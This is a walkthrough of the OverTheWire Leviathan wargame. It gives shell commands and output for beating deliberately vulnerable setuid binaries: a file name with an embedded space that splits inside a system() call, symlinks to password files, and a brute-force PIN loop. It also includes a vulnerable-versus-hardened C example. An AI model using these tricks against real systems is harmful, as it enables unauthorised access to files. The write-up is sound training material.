Over the Wire Leviathan walkthrough

This is the second easiest Over the Wire game. Again, I'm not going to explain how every command works. If you want to know, look at how I used it and use the man pages to figure out what all the flags are for.
This walkthrough completes the OverTheWire game Leviathan, which you can find at http://overthewire.org/wargames/leviathan

Leviathan 0:

Leviathan0 gives us a simple username and password to log in with SSH. One tip I would like to add is that I made a shell variable "level" and set it equal to "leviathan0". To log in with ssh, I type

$ ssh $level@leviathan.labs.overthewire.org

With this, I am able to just edit the last character of the level each time I need to log in, rather than move through the entire SSH command.

So, with the ssh command shown above, we are able to log in to leviathan0.

Leviathan 0 -> Leviathan 1:

Moving from leviathan 0 to leviathan 1 is fairly simple. Running ls -la, we see that there is a directory named .backup.

leviathan0@melinda:~$ ls -la
total 24
drwxr-xr-x   3 root root       4096 Jun  6  2013 .
drwxr-xr-x 160 root root       4096 Jul 28 17:05 ..
drwxr-x---   2 root leviathan0 4096 Jun  6  2013 .backup

Inside of this directory, there is the file bookmarks.html. Simply searching for the string password in that file gives us the password.

leviathan0@melinda:~$ cat .backup/bookmarks.html | grep password
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is rioGegei8m" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to leviathan1</A>

Leviathan 1 -> Leviathan 2:
Here we have a file named "check". We can run it and see what happens.

leviathan1@melinda:~$ ./check
password: asdf
Wrong password, Good Bye ...

Bummer. Let's run ltrace on it and see what is actually happening.

leviathan1@melinda:~$ ltrace ./check 
strcmp("asd", "sex")

There, we can see that it is running strcmp against the string "sex". Now if we use that as the password for the file, we will get a shell, from which we can cat the password.

leviathan1@melinda:~$ ./check
password: sex
$ cat /etc/leviathan_pass/leviathan2

Leviathan 2 -> Leviathan 3:

In this level, we have a file named printfile. Looking at it with ltrace, we see that it is calling the access function.

leviathan2@melinda:~$ ltrace ./printfile /tmp/zer0w1re123
access("/tmp/zer0w1re123", 4)
snprintf("/bin/cat /tmp/zer0w1re123", 511, "/bin/cat %s", "/tmp/zer0w1re123")                                           
system("/bin/cat /tmp/zer0w1re123")

From here we can see that it calls access to check that the file is there, and then it passes a cat command to system. If we can get the access check to pass, we can get cat to read our file. What we want to do is create a directory in /tmp.

leviathan2@melinda:~$ mkdir /tmp/zer0w1re_test

And then we will create two files: 'file' and 'file asdf'. The first, 'file', is going to be a symbolic link to our password file, and the second file's name needs to start with the first file's name, followed by a space. See the commands below if you don't understand.

leviathan2@melinda:/tmp/zer0w1re_test$ ln -s /etc/leviathan_pass/leviathan3 ./file
leviathan2@melinda:/tmp/zer0w1re_test$ touch file\ asdf

Now we can run printfile on "file asdf". This gets us past the access check, since "file asdf" exists. When the name reaches the cat command, the space splits it into two separate files, "file" and "asdf", giving us access to the password through our symbolic link.

leviathan2@melinda:~$ ./printfile /tmp/zer0w1re_test/file\ asdf
/bin/cat: asdf: No such file or directory

And there's our password!
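As an added example (not part of the original walkthrough and not the game's source), here is the access()-then-shell pattern from the ltrace output in C, next to a version that opens the file directly. The function names and the temporary fixture under /tmp are constructed for illustration, and popen() stands in for system() so the output can be captured.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Pattern from the ltrace output: access() checks the whole name, then the
 * name is pasted into a shell command, where the space splits it in two. */
static int read_via_shell(const char *path, char *out, size_t n) {
    char cmd[512];
    if (access(path, R_OK) != 0) return -1;
    snprintf(cmd, sizeof cmd, "/bin/cat %s 2>/dev/null", path);
    FILE *p = popen(cmd, "r");          /* popen() so the output can be captured */
    if (!p) return -1;
    size_t got = fread(out, 1, n - 1, p);
    out[got] = '\0';
    pclose(p);
    return (int)got;
}

/* Hardened: no shell, open exactly the name given, refuse a symlink. */
static int read_direct(const char *path, char *out, size_t n) {
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0) return -1;
    ssize_t got = read(fd, out, n - 1);
    close(fd);
    out[got < 0 ? 0 : got] = '\0';
    return (int)got;
}

/* Constructed fixture: "file" links to a stand-in secret, "file asdf" is a decoy. */
static int make_fixture(char *spaced, size_t n) {
    char dir[] = "/tmp/printfile_demo_XXXXXX", secret[64], lnk[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(secret, sizeof secret, "%s/secret", dir);
    snprintf(lnk, sizeof lnk, "%s/file", dir);
    snprintf(spaced, n, "%s/file asdf", dir);
    FILE *f = fopen(secret, "w"); if (f) { fputs("SECRET\n", f); fclose(f); }
    f = fopen(spaced, "w");       if (f) { fputs("decoy\n", f); fclose(f); }
    return symlink(secret, lnk);
}

int main(void) {
    char path[64], buf[64];
    if (make_fixture(path, sizeof path) != 0) return 1;
    if (read_via_shell(path, buf, sizeof buf) > 0) printf("shell:  %s", buf);
    if (read_direct(path, buf, sizeof buf) > 0)    printf("direct: %s", buf);
    return 0;
}
```

In a setuid program the open should also happen after dropping to the real UID, which makes the separate access() check unnecessary.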

Leviathan 3 -> Leviathan 4:

leviathan3@melinda:~$ ltrace ./level3 
fgets(Enter the password> asdf
"asdf\n", 256, 0xf7fceac0)          = 0xffffd61c
puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG)
leviathan3@melinda:~$ strings ./level3 
[You've got shell]!
bzzzzzzzzap. WRONG
Enter the password> 

Here we can see right before "[You've got shell]!" it says snlprintf. Maybe this is our password to get the shell?

leviathan3@melinda:~$ ./level3 
Enter the password> snlprintf
[You've got shell]!
$ cat /etc/leviathan_pass/leviathan4

Leviathan 4 -> Leviathan 5:

Here we have the folder '.trash' in our home directory. Inside there is a file 'bin'. When you run it you get a bunch of binary.

leviathan4@melinda:~$ ls -la
total 24
drwxr-xr-x   3 root root       4096 Jun  6  2013 .
drwxr-xr-x 160 root root       4096 Jul 28 17:05 ..
-rw-r--r--   1 root root        220 Apr  3  2012 .bash_logout
-rw-r--r--   1 root root       3486 Apr  3  2012 .bashrc
-rw-r--r--   1 root root        675 Apr  3  2012 .profile
dr-xr-x---   2 root leviathan4 4096 Jun  6  2013 .trash
leviathan4@melinda:~$ cd .trash
leviathan4@melinda:~/.trash$ ls
leviathan4@melinda:~/.trash$ ./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010

There is a great website we can use to decode this called Crypo. It resides at http://crypo.in.ua. Using the ascii to binary conversion, we get the password: Tith4cokei

Leviathan 5 -> Leviathan 6:

There is a file called leviathan5. When we try to run it, it complains that it can't find /tmp/file.log.

leviathan5@melinda:~$ ./leviathan5 
Cannot find /tmp/file.log

We can try making /tmp/file.log a symbolic link to our password file.

leviathan5@melinda:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
leviathan5@melinda:~$ ./leviathan5 

Boom, password!

Leviathan 6 -> Leviathan 7:

Here we have another file in the home directory, called leviathan6. If we try to run it, it asks for a four-digit code as an argument. The only way I could think to solve this was brute force. We can create a bash one-liner to accomplish this.

for i in {0000..9999}; do ./leviathan6 $i; echo $i; done

We could get rid of the "echo $i", but I just was interested in actually knowing which combo worked.

$ cat /etc/leviathan_pass/leviathan7

There we have a shell, and we have the password!

I hope you enjoyed working through these problems as much as I did. I'll be moving on to Natas or Krypton soon.